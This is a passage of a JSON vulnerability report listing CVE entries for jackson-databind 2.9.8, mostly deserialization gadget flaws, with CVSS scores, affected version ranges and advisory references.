cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9547/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24750"]}],"cve":"CVE-2020-24750","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-24750"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201009-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"NetApp Advisory ntap-20201009-0003","url":"https://security.netapp.com/advisory/ntap-20201009-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"]}],"title":"CVE-2020-24750/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35491"]}],"cve":"CVE-2020-35491","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:11","ids":[{"system_name":"CVE Record","text":"CVE-2020-35491"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Dynamically-Managed Code Resources","title":"Additional CWE: 913"},{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35491/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36187"]}],"cve":"CVE-2020-36187","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-36187"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36187/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10968"]}],"cve":"CVE-2020-10968","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-10968"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10968/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42004"]}],"cve":"CVE-2022-42004","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42004"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0008"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in FasterXML jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in FasterXML jackson-databind In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221118-0008","url":"https://security.netapp.com/advisory/ntap-20221118-0008"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2022-42004/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10650"]}],"cve":"CVE-2020-10650","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-07-15T19:41:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-10650"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"NetApp Advisory ntap-20230818-0007","url":"https://security.netapp.com/advisory/ntap-20230818-0007"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2022","url":"https://www.oracle.com/security-alerts/cpuoct2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-10650/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11111"]}],"cve":"CVE-2020-11111","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-11111"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11111/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36186"]}],"cve":"CVE-2020-36186","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-11-19T20:13:06","ids":[{"system_name":"CVE Record","text":"CVE-2020-36186"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36186/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36189"]}],"cve":"CVE-2020-36189","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-36189"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 